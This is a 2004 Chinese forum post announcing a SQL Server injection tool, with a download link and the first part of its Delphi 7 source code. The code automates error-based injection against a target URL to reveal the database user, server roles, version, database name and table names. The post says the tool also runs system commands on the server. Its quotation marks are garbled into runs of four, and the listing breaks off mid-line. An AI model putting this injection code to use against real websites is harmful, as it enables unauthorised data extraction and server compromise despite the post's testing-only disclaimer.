SQL Server注入工具 1.0

利用SQL Server的注入漏洞实现猜解数据库名，表名，字段名及记录的信息，由于网速的原因，目前限制了只能同时猜解前5个字段值的记录信息。另外实现了三种方式执行系统命令，同时可回显显示。

本程序只供测试研究使用，由此软件造成的后果一概不负责任，由于编写比较仓促，代码难免有纰漏之处，欢迎大家批评指正。

下载地址：http://free.efile.com.cn/hnxyy/NBSI.exe

作者:Hnxyy  QQ:19026695

 2004.12.16    北京

FireFox技术交流论坛
http://www.wrsky.com
临时访问地址
http://firefoxer.nease.net
It is all beginnings free
It is all ruin to be privately owned


D7原代码：

unit untmain;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, idHttp, IdBaseComponent, IdComponent, IdTCPConnection,
  IdTCPClient, OleCtrls, SHDocVw,mshtml;

type
  TForm1 = class(TForm)
    Label1: TLabel;
    EdtUrl: TEdit;
    BtnCheck: TButton;
    Label2: TLabel;
    GroupBox1: TGroupBox;
    Label7: TLabel;
    Label3: TLabel;
    Label4: TLabel;
    Label5: TLabel;
    Label6: TLabel;
    EdtMuliCase: TEdit;
    EdtQuery: TEdit;
    EdtUser: TEdit;
    EdtPower: TEdit;
    EdtDbName: TEdit;
    Memo1: TMemo;
    GroupBox2: TGroupBox;
    cbDisp: TCheckBox;
    EdtCommand: TEdit;
    rbCmd: TRadioButton;
    rbOA: TRadioButton;
    BtnExecute: TButton;
    GroupBox3: TGroupBox;
    Memo2: TMemo;
    wb: TWebBrowser;
    BtnStop: TButton;
    rbJob: TRadioButton;
    BtnCancel: TButton;
    procedure BtnCheckClick(Sender: TObject);
    procedure BtnExecuteClick(Sender: TObject);
    procedure wbDocumentComplete(Sender: TObject; const pDisp: IDispatch;
      var URL: OleVariant);
    procedure BtnStopClick(Sender: TObject);
    procedure rbCmdClick(Sender: TObject);
    procedure rbOAClick(Sender: TObject);
    procedure rbJobClick(Sender: TObject);
    procedure FormShow(Sender: TObject);
    procedure BtnCancelClick(Sender: TObject);
  private
    { Private declarations }
    tag:integer;
    isFinish,isCancel:boolean;
    function Get(URL: string): boolean;
    function GetWBMsg(URL: string): string;
    Function StrToNChar(DbName,TName:string): string;
    procedure SetRdbCheck(rd:TRadioButton);
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.BtnCheckClick(Sender: TObject);
const
  vFieldCount=5;
  PowerStr :array[0..6] of string=(
     ''''sysadmin'''',''''dbcreator'''',''''diskadmin'''',
     ''''processadmin'''',''''serveradmin'''',
     ''''setupadmin'''',''''securityadmin'''');
var
  Url,DbName,TName,TName0,ColName,ColName0,NCharStr:string;
  i,j,k,iCount:integer;
  VerStr,ValueStr,CountStr,Powers:string;
  FieldStr,FieldOrdStr,CFieldStr:string;
  vfield:OleVariant;
begin
  try
    EdtMuliCase.Text :='''''''';
    EdtQuery.Text :='''''''';
    EdtUser.Text :='''''''';
    EdtPower.Text :='''''''';
    EdtDbName.Text :='''''''';
    Url:=trim(EdtUrl.Text);
    isFinish :=False;
    vfield :=VarArrayCreate([0,vFieldCount-1],varVariant);
    Memo1.Clear;
    Screen.Cursor :=crHourGlass;
    //判断是否支持多句查询
    if Get(Url+'''';declare%20@a%20int--'''') then
    begin
      EdtMuliCase.Text :=''''支持'''';
    end else
    begin
      EdtMuliCase.Text :=''''不支持'''';
    end;
    //判断是否支持子查询
    if get(Url+''''%20and%20(Select%20count(1)%20from%20[sysobjects])>=0'''') then
    begin
      EdtQuery.Text :=''''支持'''';
    end else
    begin
      EdtQuery.Text :=''''不支持'''';
    end;
    //取得当前用户
    EdtUser.Text :=GetWBMsg(Url+''''%20and%20char(124)%2Buser%2Bchar(124)=0'''');
    //取得当前用户登录的服务器角色成员
    for i:=0 to High(PowerStr) do
    begin
      if get(Url+''''%20And%20Cast(IS_SRVROLEMEMBER(''''''''''''+PowerStr[i]+'''''''''''')%20as%20varchar(1))=1'''') then
      begin
        Powers :=Powers+PowerStr[i]+''''|'''';
      end;
    end;
    if Powers='''''''' then
      EdtPower.Text :=''''未知''''
    else EdtPower.Text :=Powers;
    //指明当前用户是否为 db_owner 固定数据库角色的成员
  {  if get(Url+''''%20And%20Cast(IS_MEMBER(''''''''db_owner'''''''')%20as%20varchar(1))=1'''') then
    begin
      EdtPower.Text :=''''db_owner'''';
    end else
    begin
      EdtPower.Text :=''''未知'''';
    end;  }
    //得到当前SQL Server的版本号
    VerStr :=GetWBMsg(Url+''''%20and%20char(124)%2B@@version%2Bchar(124)>0'''');
    Memo1.Lines.Add(''''当前版本号：''''+VerStr);
    Memo1.Lines.Add('''''''');
    //取得数据库名
    DbName :=GetWBMsg(Url+''''%20And%20char(124)%2Bdb_name()%2Bchar(124)=0'''');
    EdtDbName.Text :=DbName;
    if (DbName='''''''') or (DbName=''''未知'''') then
    begin
      Memo1.Lines.Add(''''未知的数据库，操作终止！'''');
      exit;
    end;
    Memo1.Lines.Add(''''当前数据库：''''+DbName);
    BtnStop.Visible :=true;
    BtnCheck.Visible :=False;
    //猜解表名
    Memo1.Lines.Add('''''''');
    Memo1.Lines.Add(''''开始猜解表名.....'''');
    Memo1.Lines.Add(''''#######################'''');
    for i:=1 to 1000 do
    begin
      TName :='''''''';
      TName :=GetWBMsg(Url+''''%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)%20as%20varchar(8000))''''+
                       ''''%20from(Select%20Top%20''''+inttostr(i)+''''%20id,name%20from%20[''''+DbName+'''']..[sysobjects]''''+
                       ''''%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0;--'''');
      if (TName0=T

[1] [2] [3] [4]  下一页